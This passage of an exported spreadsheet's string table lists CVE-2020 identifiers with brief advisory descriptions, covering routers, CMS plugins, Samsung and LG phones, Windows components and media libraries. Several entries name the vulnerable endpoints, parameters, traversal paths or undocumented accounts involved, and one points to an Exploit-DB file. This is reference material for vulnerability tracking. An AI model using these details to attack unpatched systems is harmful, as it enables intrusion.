    <t>systemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082.</t>
  </si>
  <si>
    <t>CVE-2020-13777</t>
  </si>
  <si>
    <t>GnuTLS 3.6.x before 3.6.14 uses incorrect cryptography for encrypting a session ticket (a loss of confidentiality in TLS 1.2, and an authentication bypass in TLS 1.3). The earliest affected version is 3.6.4 (2018-09-24) because of an error in a 2018-09-18 commit. Until the first key rotation, the TLS server always uses wrong data in place of an encryption key derived from an application.</t>
  </si>
  <si>
    <t>CVE-2020-13778</t>
  </si>
  <si>
    <t>rConfig 3.9.4 and earlier allows authenticated code execution (of system commands) by sending a forged GET request to lib/ajaxHandlers/ajaxAddTemplate.php or lib/ajaxHandlers/ajaxEditTemplate.php.</t>
  </si>
  <si>
    <t>CVE-2020-1378</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory, aka 'Windows Registry Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1377.</t>
  </si>
  <si>
    <t>CVE-2020-13782</t>
  </si>
  <si>
    <t>D-Link DIR-865L Ax 1.20B01 Beta devices allow Command Injection.</t>
  </si>
  <si>
    <t>CVE-2020-13783</t>
  </si>
  <si>
    <t>D-Link DIR-865L Ax 1.20B01 Beta devices have Cleartext Storage of Sensitive Information.</t>
  </si>
  <si>
    <t>CVE-2020-13784</t>
  </si>
  <si>
    <t>D-Link DIR-865L Ax 1.20B01 Beta devices have a predictable seed in a Pseudo-Random Number Generator.</t>
  </si>
  <si>
    <t>CVE-2020-13785</t>
  </si>
  <si>
    <t>D-Link DIR-865L Ax 1.20B01 Beta devices have Inadequate Encryption Strength.</t>
  </si>
  <si>
    <t>CVE-2020-13786</t>
  </si>
  <si>
    <t>D-Link DIR-865L Ax 1.20B01 Beta devices allow CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-13787</t>
  </si>
  <si>
    <t>D-Link DIR-865L Ax 1.20B01 Beta devices have Cleartext Transmission of Sensitive Information.</t>
  </si>
  <si>
    <t>CVE-2020-13788</t>
  </si>
  <si>
    <t>Harbor prior to 2.0.1 allows SSRF with this limitation: an attacker with the ability to edit projects can scan ports of hosts accessible on the Harbor server's intranet.</t>
  </si>
  <si>
    <t>CVE-2020-1379</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554.</t>
  </si>
  <si>
    <t>CVE-2020-13790</t>
  </si>
  <si>
    <t>libjpeg-turbo 2.0.4, and mozjpeg 4.0.0, has a heap-based buffer over-read in get_rgb_row() in rdppm.c via a malformed PPM input file.</t>
  </si>
  <si>
    <t>CVE-2020-13791</t>
  </si>
  <si>
    <t>hw/pci/pci.c in QEMU 4.2.0 allows guest OS users to trigger an out-of-bounds access by providing an address near the end of the PCI configuration space.</t>
  </si>
  <si>
    <t>CVE-2020-13792</t>
  </si>
  <si>
    <t>PlayTube 1.8 allows disclosure of user details via ajax.php?type=../admin-panel/autoload&amp;page=manage-users directory traversal, aka local file inclusion.</t>
  </si>
  <si>
    <t>CVE-2020-13793</t>
  </si>
  <si>
    <t>Unsafe storage of AD credentials in Ivanti DSM netinst 5.1 due to a static, hard-coded encryption key.</t>
  </si>
  <si>
    <t>CVE-2020-13794</t>
  </si>
  <si>
    <t>Harbor 1.9.* 1.10.* and 2.0.* allows Exposure of Sensitive Information to an Unauthorized Actor.</t>
  </si>
  <si>
    <t>CVE-2020-13795</t>
  </si>
  <si>
    <t>An issue was discovered in Navigate CMS through 2.8.7. It allows Directory Traversal because lib/packages/templates/template.class.php mishandles ../ and ..\ substrings.</t>
  </si>
  <si>
    <t>CVE-2020-13796</t>
  </si>
  <si>
    <t>An issue was discovered in Navigate CMS through 2.8.7. It allows XSS because of a lack of purify calls in lib/packages/structure/structure.class.php.</t>
  </si>
  <si>
    <t>CVE-2020-13797</t>
  </si>
  <si>
    <t>An issue was discovered in Navigate CMS through 2.8.7. It allows XSS because of a lack of purify calls in lib/packages/websites/website.class.php.</t>
  </si>
  <si>
    <t>CVE-2020-13798</t>
  </si>
  <si>
    <t>An issue was discovered in Navigate CMS through 2.8.7. It allows XSS because of a lack of purify calls in lib/packages/feeds/feed.class.php.</t>
  </si>
  <si>
    <t>CVE-2020-13799</t>
  </si>
  <si>
    <t>Western Digital has identified a security vulnerability in the Replay Protected Memory Block (RPMB) protocol as specified in multiple standards for storage device interfaces, including all versions of eMMC, UFS, and NVMe. The RPMB protocol is specified by industry standards bodies and is implemented by storage devices from multiple vendors to assist host systems in securing trusted firmware. Several scenarios have been identified in which the RPMB state may be affected by an attacker without the knowledge of the trusted component that uses the RPMB feature.</t>
  </si>
  <si>
    <t>CVE-2020-1380</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1555, CVE-2020-1570.</t>
  </si>
  <si>
    <t>CVE-2020-13800</t>
  </si>
  <si>
    <t>ati-vga in hw/display/ati.c in QEMU 4.2.0 allows guest OS users to trigger infinite recursion via a crafted mm_index value during an ati_mm_read or ati_mm_write call.</t>
  </si>
  <si>
    <t>CVE-2020-13802</t>
  </si>
  <si>
    <t>Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification.</t>
  </si>
  <si>
    <t>CVE-2020-13803</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit PhantomPDF Mac and Foxit Reader for Mac before 4.0. It allows signature validation bypass via a modified file or a file with non-standard signatures.</t>
  </si>
  <si>
    <t>CVE-2020-13804</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 9.7.2. It allows information disclosure of a hardcoded username and password in the DocuSign plugin.</t>
  </si>
  <si>
    <t>CVE-2020-13805</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 9.7.2. It has brute-force attack mishandling because the CAS service lacks a limit on login failures.</t>
  </si>
  <si>
    <t>CVE-2020-13806</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 9.7.2. It has a use-after-free because of JavaScript execution after a deletion or close operation.</t>
  </si>
  <si>
    <t>CVE-2020-13807</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 9.7.2. It has circular reference mishandling that causes a loop.</t>
  </si>
  <si>
    <t>CVE-2020-13808</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 9.7.2. It allows resource consumption via crafted cross-reference stream data.</t>
  </si>
  <si>
    <t>CVE-2020-13809</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 9.7.2. It allows resource consumption via long strings in the content stream.</t>
  </si>
  <si>
    <t>CVE-2020-1381</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory, aka 'Windows Graphics Component Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1382.</t>
  </si>
  <si>
    <t>CVE-2020-13810</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 9.7.2. It allows signature validation bypass via a modified file or a file with non-standard signatures.</t>
  </si>
  <si>
    <t>CVE-2020-13811</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Studio Photo before 3.6.6.922. It has an out-of-bounds write via a crafted TIFF file.</t>
  </si>
  <si>
    <t>CVE-2020-13812</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Studio Photo before 3.6.6.922. It allows local users to gain privileges via a crafted DLL in the current working directory.</t>
  </si>
  <si>
    <t>CVE-2020-13813</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Studio Photo before 3.6.6.922. It allows local users to gain privileges via a crafted DLL in the current working directory when FoxitStudioPhoto366_3.6.6.916.exe is used.</t>
  </si>
  <si>
    <t>CVE-2020-13814</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 9.7.1. It has a use-after-free via a document that lacks a dictionary.</t>
  </si>
  <si>
    <t>CVE-2020-13815</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 9.7.1. It allows stack consumption via a loop of an indirect object reference.</t>
  </si>
  <si>
    <t>CVE-2020-13817</t>
  </si>
  <si>
    <t>ntpd in ntp before 4.2.8p14 and 4.3.x before 4.3.100 allows remote attackers to cause a denial of service (daemon exit or system time change) by predicting transmit timestamps for use in spoofed packets. The victim must be relying on unauthenticated IPv4 time sources. There must be an off-path attacker who can query time from the victim's ntpd instance.</t>
  </si>
  <si>
    <t>CVE-2020-13818</t>
  </si>
  <si>
    <t>In Zoho ManageEngine OpManager before 125144, when &lt;cachestart&gt; is used, directory traversal validation can be bypassed.</t>
  </si>
  <si>
    <t>CVE-2020-13819</t>
  </si>
  <si>
    <t>Extreme EAC Appliance 8.4.1.24 allows unauthenticated reflected XSS via a parameter in a GET request.</t>
  </si>
  <si>
    <t>CVE-2020-1382</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory, aka 'Windows Graphics Component Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1381.</t>
  </si>
  <si>
    <t>CVE-2020-13820</t>
  </si>
  <si>
    <t>Extreme Management Center 8.4.1.24 allows unauthenticated reflected XSS via a parameter in a GET request.</t>
  </si>
  <si>
    <t>CVE-2020-13821</t>
  </si>
  <si>
    <t>An issue was discovered in HiveMQ Broker Control Center 4.3.2. A crafted clientid parameter in an MQTT packet (sent to the Broker) is reflected in the client section of the management console. The attacker's JavaScript is loaded in a browser, which can lead to theft of the session and cookie of the administrator's account of the Broker.</t>
  </si>
  <si>
    <t>CVE-2020-13822</t>
  </si>
  <si>
    <t>The Elliptic package 6.5.2 for Node.js allows ECDSA signature malleability via variations in encoding, leading '\0' bytes, or integer overflows. This could conceivably have a security-relevant impact if an application relied on a single canonical signature.</t>
  </si>
  <si>
    <t>CVE-2020-13825</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in i-doit 1.14.2 allows remote attackers to inject arbitrary web script or HTML via the viewMode, tvMode, tvType, objID, catgID, objTypeID, or editMode parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13826</t>
  </si>
  <si>
    <t>A CSV injection (aka Excel Macro Injection or Formula Injection) issue in i-doit 1.14.2 allows an attacker to execute arbitrary commands via a Title parameter that is mishandled in a CSV export.</t>
  </si>
  <si>
    <t>CVE-2020-13827</t>
  </si>
  <si>
    <t>phpList before 3.5.4 allows XSS via /lists/admin/user.php and /lists/admin/users.php.</t>
  </si>
  <si>
    <t>CVE-2020-13828</t>
  </si>
  <si>
    <t>Dolibarr 11.0.4 is affected by multiple stored Cross-Site Scripting (XSS) vulnerabilities that could allow remote authenticated attackers to inject arbitrary web script or HTML via ticket/card.php?action=create with the subject, message, or address parameter; adherents/card.php with the societe or address parameter; product/card.php with the label or customcode parameter; or societe/card.php with the alias or barcode parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13829</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) software. Attackers can disable the SEAndroid protection mechanism in the RKP. The Samsung ID is SVE-2019-15998 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-1383</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled, aka 'Windows RRAS Service Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13830</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) software. One UI HOME logging can leak information. The Samsung ID is SVE-2019-16382 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13831</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x) and P(9.0) (Exynos 7570 chipsets) software. The Trustonic Kinibi component allows arbitrary memory mapping. The Samsung ID is SVE-2019-16665 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13832</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) (with TEEGRIS on Exynos chipsets) software. The Widevine Trustlet allows arbitrary code execution because of memory disclosure, The Samsung IDs are SVE-2020-17117, SVE-2020-17118, SVE-2020-17119, and SVE-2020-17161 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13833</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. The system area allows arbitrary file overwrites via a symlink attack. The Samsung ID is SVE-2020-17183 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13834</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) (with TEEGRIS) software. Secure Folder does not properly restrict use of Android Debug Bridge (adb) for arbitrary installations. The Samsung ID is SVE-2020-17369 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13835</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x) (with TEEGRIS) software. The Gatekeeper Trustlet allows a brute-force attack on user credentials. The Samsung ID is SVE-2020-16908 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13836</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. HWRResProvider allows path traversal for data exposure. The Samsung ID is SVE-2020-16954 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13837</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) software. The Lockscreen feature does not block Quick Panel access to Music Share. The Samsung ID is SVE-2020-17145 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13838</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) software. The DeX Lockscreen feature does not block access to Quick Panel and notifications. The Samsung ID is SVE-2020-17187 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13839</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 (MTK chipsets). Code execution can occur via a custom AT command handler buffer overflow. The LG ID is LVE-SMP-200007 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-1384</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Cryptography Next Generation (CNG) Key Isolation service improperly handles memory, aka 'Windows CNG Key Isolation Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1359.</t>
  </si>
  <si>
    <t>CVE-2020-13840</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 (MTK chipsets). Code execution can occur via an MTK AT command handler buffer overflow. The LG ID is LVE-SMP-200008 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13841</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 9 and 10 (MTK chipsets). An AT command handler allows attackers to bypass intended access restrictions. The LG ID is LVE-SMP-200009 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13842</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 (MTK chipsets). A dangerous AT command was made available even though it is unused. The LG ID is LVE-SMP-200010 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13843</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS software before 2020-06-01. Local users can cause a denial of service because checking of the userdata partition is mishandled. The LG ID is LVE-SMP-200014 (June 2020).</t>
  </si>
  <si>
    <t>CVE-2020-13844</t>
  </si>
  <si>
    <t>Arm Armv8-A core implementations utilizing speculative execution past unconditional changes in control flow may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka "straight-line speculation."</t>
  </si>
  <si>
    <t>CVE-2020-13845</t>
  </si>
  <si>
    <t>Sylabs Singularity 3.0 through 3.5 has Improper Validation of an Integrity Check Value. Image integrity is not validated when an ECL policy is enforced. The fingerprint required by the ECL is compared against the signature object descriptor(s) in the SIF file, rather than to a cryptographically validated signature.</t>
  </si>
  <si>
    <t>CVE-2020-13846</t>
  </si>
  <si>
    <t>Sylabs Singularity 3.5.0 through 3.5.3 fails to report an error in a Status Code.</t>
  </si>
  <si>
    <t>CVE-2020-13847</t>
  </si>
  <si>
    <t>Sylabs Singularity 3.0 through 3.5 lacks support for an Integrity Check. Singularity's sign and verify commands do not sign metadata found in the global header or data object descriptors of a SIF file.</t>
  </si>
  <si>
    <t>CVE-2020-13848</t>
  </si>
  <si>
    <t>Portable UPnP SDK (aka libupnp) 1.12.1 and earlier allows remote attackers to cause a denial of service (crash) via a crafted SSDP message due to a NULL pointer dereference in the functions FindServiceControlURLPath and FindServiceEventURLPath in genlib/service_table/service_table.c.</t>
  </si>
  <si>
    <t>CVE-2020-13849</t>
  </si>
  <si>
    <t>The MQTT protocol 3.1.1 requires a server to set a timeout value of 1.5 times the Keep-Alive value specified by a client, which allows remote attackers to cause a denial of service (loss of the ability to establish new connections), as demonstrated by SlowITe.</t>
  </si>
  <si>
    <t>CVE-2020-1385</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Credential Picker handles objects in memory, aka 'Windows Credential Picker Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13850</t>
  </si>
  <si>
    <t>Artica Pandora FMS 7.44 has inadequate access controls on a web folder.</t>
  </si>
  <si>
    <t>CVE-2020-13851</t>
  </si>
  <si>
    <t>Artica Pandora FMS 7.44 allows remote command execution via the events feature.</t>
  </si>
  <si>
    <t>CVE-2020-13852</t>
  </si>
  <si>
    <t>Artica Pandora FMS 7.44 allows arbitrary file upload (leading to remote command execution) via the File Manager feature.</t>
  </si>
  <si>
    <t>CVE-2020-13853</t>
  </si>
  <si>
    <t>Artica Pandora FMS 7.44 has persistent XSS in the Messages feature.</t>
  </si>
  <si>
    <t>CVE-2020-13854</t>
  </si>
  <si>
    <t>Artica Pandora FMS 7.44 allows privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-13855</t>
  </si>
  <si>
    <t>Artica Pandora FMS 7.44 allows arbitrary file upload (leading to remote command execution) via the File Repository Manager feature.</t>
  </si>
  <si>
    <t>CVE-2020-13856</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 4.0.8-std devices. Authentication is not required to download the support file that contains sensitive information such as cleartext credentials and password hashes.</t>
  </si>
  <si>
    <t>CVE-2020-13857</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 3.6.1-std and 4.0.8-std devices. They can be rebooted by sending an unauthenticated poof.cgi HTTP GET request.</t>
  </si>
  <si>
    <t>CVE-2020-13858</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 3.6.1-std and 4.0.8-std devices. They contain two undocumented administrator accounts. The sftp and mofidev accounts are defined in /etc/passwd and the password is not unique across installations.</t>
  </si>
  <si>
    <t>CVE-2020-13859</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 4.0.8-std devices. A format error in /etc/shadow, coupled with a logic bug in the LuCI - OpenWrt Configuration Interface framework, allows the undocumented system account mofidev to login to the cgi-bin/luci/quick/wizard management interface without a password by abusing a forgotten-password feature.</t>
  </si>
  <si>
    <t>CVE-2020-1386</t>
  </si>
  <si>
    <t>exploits/windows/local/48573.txt</t>
  </si>
  <si>
    <t>WinGate 9.4.1.5998 - Insecure Folder Permissions</t>
  </si>
  <si>
    <t>2020-06-10</t>
  </si>
  <si>
    <t>CVE-2020-13860</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 4.0.8-std devices. The one-time password algorithm for the undocumented system account mofidev generates a predictable six-digit password.</t>
  </si>
  <si>
    <t>CVE-2020-13863</t>
  </si>
  <si>
    <t>The SAS portal of Mitel MiCollab before 9.1.3 could allow an attacker to access user data by performing a header injection in HTTP responses, due to the improper handling of input parameters. A successful exploit could allow an attacker to access user information.</t>
  </si>
  <si>
    <t>CVE-2020-13864</t>
  </si>
  <si>
    <t>The Elementor Page Builder plugin before 2.9.9 for WordPress suffers from a stored XSS vulnerability. An author user can create posts that result in a stored XSS by using a crafted payload in custom links.</t>
  </si>
  <si>
    <t>CVE-2020-13865</t>
  </si>
  <si>
    <t>The Elementor Page Builder plugin before 2.9.9 for WordPress suffers from multiple stored XSS vulnerabilities. An author user can create posts that result in stored XSS vulnerabilities, by using a crafted link in the custom URL or by applying custom attributes.</t>
  </si>
  <si>
    <t>CVE-2020-13866</t>
  </si>
  <si>
    <t>WinGate v9.4.1.5998 has insecure permissions for the installation directory, which allows local users to gain privileges by replacing an executable file with a Trojan horse.</t>
  </si>
  <si>
    <t>CVE-2020-13867</t>
  </si>
  <si>
    <t>Open-iSCSI targetcli-fb through 2.1.52 has weak permissions for /etc/target (and for the backup directory and backup files).</t>
  </si>
  <si>
    <t>CVE-2020-13868</t>
  </si>
  <si>
    <t>An issue was discovered in the Comments plugin before 1.5.5 for Craft CMS. CSRF affects comment integrity.</t>
  </si>
  <si>
    <t>CVE-2020-13869</t>
  </si>
  <si>
    <t>An issue was discovered in the Comments plugin before 1.5.6 for Craft CMS. There is stored XSS via a guest name.</t>
  </si>
  <si>
    <t>CVE-2020-1387</t>
  </si>
  <si>
    <t>CVE-2020-13870</t>
  </si>
  <si>
    <t>An issue was discovered in the Comments plugin before 1.5.5 for Craft CMS. There is stored XSS via an asset volume name.</t>
  </si>
  <si>
    <t>CVE-2020-13871</t>
  </si>
  <si>
    <t>SQLite 3.32.2 has a use-after-free in resetAccumulator in select.c because the parse tree rewrite for window functions is too late.</t>
  </si>
  <si>
    <t>CVE-2020-13872</t>
  </si>
  <si>
    <t>Royal TS before 5 has a 0.0.0.0 listener, which makes it easier for attackers to bypass tunnel authentication via a brute-force approach.</t>
  </si>
  <si>
    <t>CVE-2020-13873</t>
  </si>
  <si>
    <t>A SQL Injection vulnerability in get_topic_info() in sys/CODOF/Forum/Topic.php in Codoforum before 4.9 allows remote attackers (pre-authentication) to bypass the admin page via a leaked password-reset token of the admin. (As an admin, an attacker can upload a PHP shell and execute remote code on the operating system.)</t>
  </si>
  <si>
    <t>CVE-2020-13877</t>
  </si>
  <si>
    <t>SQL Injection issues in various ASPX pages of ResourceXpress Meeting Monitor 4.9 could lead to remote code execution and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1388</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the psmsrv.dll handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1392, CVE-2020-1394, CVE-2020-1395.</t>
  </si>
  <si>
    <t>CVE-2020-13881</t>
  </si>
  <si>
    <t>In support.c in pam_tacplus 1.3.8 through 1.5.1, the TACACS+ shared secret gets logged via syslog if the DEBUG loglevel and journald are used.</t>
  </si>
  <si>
    <t>CVE-2020-13882</t>
  </si>
  <si>
    <t>CISOfy Lynis before 3.0.0 has Incorrect Access Control because of a TOCTOU race condition. The routine to check the log and report file permissions was not working as intended and could be bypassed locally. Because of the race, an unprivileged attacker can set up a log and report file, and control that up to the point where the specific routine is doing its check. After that, the file can be removed, recreated, and used for additional attacks.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-13883</t>
  </si>
  <si>
    <t>In WSO2 API Manager 3.0.0 and earlier, WSO2 API Microgateway 2.2.0, and WSO2 IS as Key Manager 5.9.0 and earlier, Management Console allows XXE during addition or update of a Lifecycle.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-13884</t>
  </si>
  <si>
    <t>Citrix Workspace App before 1912 on Windows has Insecure Permissions and an Unquoted Path vulnerability which allows local users to gain privileges during the uninstallation of the application.</t>
  </si>
  <si>
    <t>CVE-2020-13885</t>
  </si>
  <si>
    <t>Citrix Workspace App before 1912 on Windows has Insecure Permissions which allows local users to gain privileges during the uninstallation of the application.</t>
  </si>
  <si>
    <t>CVE-2020-13886</t>
  </si>
  <si>
    <t>Intelbras TIP 200 60.61.75.15, TIP 200 LITE 60.61.75.15, and TIP 300 65.61.75.22 devices allow cgi-bin/cgiServer.exx?page=../ Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-13887</t>
  </si>
  <si>
    <t>documents_add.php in Kordil EDMS through 2.2.60rc3 allows Remote Command Execution because .php files can be uploaded to the documents folder.</t>
  </si>
  <si>
    <t>CVE-2020-13888</t>
  </si>
  <si>
    <t>Kordil EDMS through 2.2.60rc3 allows stored XSS in users_edit.php, users_management_edit.php, and user_management.php.</t>
  </si>
  <si>
    <t>CVE-2020-13889</t>
  </si>
  <si>
    <t>showAlert() in the administration panel in Bludit 3.12.0 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-1389</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1367, CVE-2020-1419, CVE-2020-1426.</t>
  </si>
  <si>
    <t>CVE-2020-13890</t>
  </si>
  <si>
    <t>The Neon theme 2.0 before 2020-06-03 for Bootstrap allows XSS via an Add Task Input operation in a dashboard.</t>
  </si>
  <si>
    <t>CVE-2020-13891</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Mobile Apps before 1.31.2 on iOS. Unintended third-party servers could sometimes obtain authorization tokens, aka MMSA-2020-0022.</t>
  </si>
  <si>
    <t>CVE-2020-13892</t>
  </si>
  <si>
    <t>The SportsPress plugin before 2.7.2 for WordPress allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-13893</t>
  </si>
  <si>
    <t>Multiple stored cross-site scripting (XSS) vulnerabilities in Sage EasyPay 10.7.5.10 allow authenticated attackers to inject arbitrary web script or HTML via multiple parameters through Unicode Transformations (Best-fit Mapping), as demonstrated by the full-width variants of the less-than sign (%EF%BC%9C) and greater-than sign (%EF%BC%9E).</t>
  </si>
  <si>
    <t>CVE-2020-13894</t>
  </si>
  <si>
    <t>handler/upload_handler.jsp in DEXT5 Editor through 3.5.1402961 allows an attacker to download arbitrary files via the savefilepath field.</t>
  </si>
  <si>
    <t>CVE-2020-13895</t>
  </si>
  <si>
    <t>Crypt::Perl::ECDSA in the Crypt::Perl (aka p5-Crypt-Perl) module before 0.32 for Perl fails to verify correct ECDSA signatures when r and s are small and when s = 1. This happens when using the curve secp256r1 (prime256v1). This could conceivably have a security-relevant impact if an attacker wishes to use public r and s values when guessing whether signature verification will fail.</t>
  </si>
  <si>
    <t>CVE-2020-13896</t>
  </si>
  <si>
    <t>The web interface of Maipu MP1800X-50 7.5.3.14(R) devices allows remote attackers to obtain sensitive information via the form/formDeviceVerGet URI, such as system id, hardware model, hardware version, bootloader version, software version, software image file, compilation time, and system uptime. This is similar to CVE-2019-1653.</t>
  </si>
  <si>
    <t>CVE-2020-13897</t>
  </si>
  <si>
    <t>HESK before 3.1.10 allows reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2020-13898</t>
  </si>
  <si>
    <t>An issue was discovered in janus-gateway (aka Janus WebRTC Server) through 0.10.0. janus_sdp_process in sdp.c has a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-13899</t>
  </si>
  <si>
    <t>An issue was discovered in janus-gateway (aka Janus WebRTC Server) through 0.10.0. janus_process_incoming_request in janus.c discloses information from uninitialized stack memory.</t>
  </si>
  <si>
    <t>CVE-2020-1390</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka 'Windows Network Connections Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1373, CVE-2020-1427, CVE-2020-1428, CVE-2020-1438.</t>
  </si>
  <si>
    <t>CVE-2020-13900</t>
  </si>
  <si>
    <t>An issue was discovered in janus-gateway (aka Janus WebRTC Server) through 0.10.0. janus_sdp_preparse in sdp.c has a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-13901</t>
  </si>
  <si>
    <t>An issue was discovered in janus-gateway (aka Janus WebRTC Server) through 0.10.0. janus_sdp_merge in sdp.c has a stack-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-13902</t>
  </si>
  <si>
    <t>ImageMagick 7.0.9-27 through 7.0.10-17 has a heap-based buffer over-read in BlobToStringInfo in MagickCore/string.c during TIFF image decoding.</t>
  </si>
  <si>
    <t>CVE-2020-13904</t>
  </si>
  <si>
    <t>FFmpeg 2.8 and 4.2.3 has a use-after-free via a crafted EXTINF duration in an m3u8 file because parse_playlist in libavformat/hls.c frees a pointer, and later that pointer is accessed in av_probe_input_format3 in libavformat/format.c.</t>
  </si>
  <si>
    <t>CVE-2020-13905</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000038ed4.</t>
  </si>
  <si>
    <t>CVE-2020-13906</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000038eb7.</t>
  </si>
  <si>
    <t>CVE-2020-13909</t>
  </si>
  <si>
